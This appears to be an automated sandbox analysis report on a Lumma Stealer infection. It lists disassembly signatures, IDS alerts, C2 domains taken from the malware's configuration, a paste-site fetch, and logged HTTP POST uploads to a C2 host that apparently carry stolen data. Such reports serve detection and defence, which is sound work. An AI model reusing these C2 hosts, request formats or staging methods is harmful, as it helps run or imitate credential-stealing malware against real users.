Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	8_2_02F0B960
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_02F0C931
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edx-3E4A35F2h]	8_2_02F20130
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp eax	8_2_02F20130
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+08h]	8_2_02F19920
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov word ptr [esi], ax	8_2_02EE9930
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [esp+08h], edx	8_2_02F1BEC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_02EFE660
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov ecx, eax	8_2_02EFD620
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+24h]	8_2_02F0A620
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-598631B8h]	8_2_02F01610
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h	8_2_02F01610
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	8_2_02F0BE00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then add ebx, edi	8_2_02F073C5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov edi, ecx	8_2_02F0E795
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx edx, word ptr [ebp+eax*4+00h]	8_2_02EE7790
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov edi, ecx	8_2_02F0E729
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then lea edx, dword ptr [ecx+ecx]	8_2_02EEE716
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	8_2_02F06CF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then cmp dword ptr [eax+ebx*8], 1B6183F2h	8_2_02F06CF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]	8_2_02F18CC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+37313F03h]	8_2_02EFBC7C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+37313F03h]	8_2_02EFBC7C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	8_2_02F0B440
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0CD166CFh]	8_2_02EFC457
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_02EFC457
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx]	8_2_02F1FC20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edx-3E4A35F2h]	8_2_02F1FC20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp eax	8_2_02F1FC20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movsx esi, byte ptr [eax]	8_2_02F1F418
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edx-3E4A35F2h]	8_2_02F1FDF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp eax	8_2_02F1FDF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	8_2_02EEBD77
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	8_2_02F03530
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_02F09D13
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edx-3E4A35F2h]	8_2_02F1FD00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp eax	8_2_02F1FD00
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 4x nop then or byte ptr [edi], dh	9_2_6BB47270

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 104.21.56.6:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 104.21.56.6:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.56.6:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.56.6:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 104.21.56.6:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49739 -> 104.21.56.6:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49742 -> 104.21.56.6:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: candidatersz.cyou
Source: Malware configuration extractor	URLs: peepburry828.sbs
Source: Malware configuration extractor	URLs: p3ar11fter.sbs
Source: Malware configuration extractor	URLs: 3xp3cts1aim.sbs
Source: Malware configuration extractor	URLs: p10tgrace.sbs
Source: Malware configuration extractor	URLs: processhol.sbs

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: rentry.co

Source: Joe Sandbox View

IP Address: 172.67.75.40 172.67.75.40

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.56.6:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.56.6:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.56.6:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 172.67.75.40:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.56.6:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.56.6:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.56.6:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.56.6:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.56.6:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: candidatersz.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: candidatersz.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FVIUGD64User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18106Host: candidatersz.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=27D1HLP95NPHG5NR3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8781Host: candidatersz.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=74V9R9UF91W9A8P74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20434Host: candidatersz.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7NVFDKPPXQTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1203Host: candidatersz.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NKG61ESQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 171964Host: candidatersz.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: candidatersz.cyou
Source: global traffic	HTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co

Source: global traffic	DNS traffic detected: DNS query: candidatersz.cyou
Source: global traffic	DNS traffic detected: DNS query: rentry.co

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: candidatersz.cyou

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Nov 2024 15:35:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8771Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge

Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021601981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: powershell.exe, 00000000.00000002.1929469102.0000021601981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crt0
Source: powershell.exe, 00000000.00000002.1929469102.0000021601981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021601981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021601981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021601981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: powershell.exe, 00000000.00000002.1929469102.0000021601981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0N
Source: powershell.exe, 00000000.00000002.1929469102.0000021601981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021601981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021601981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
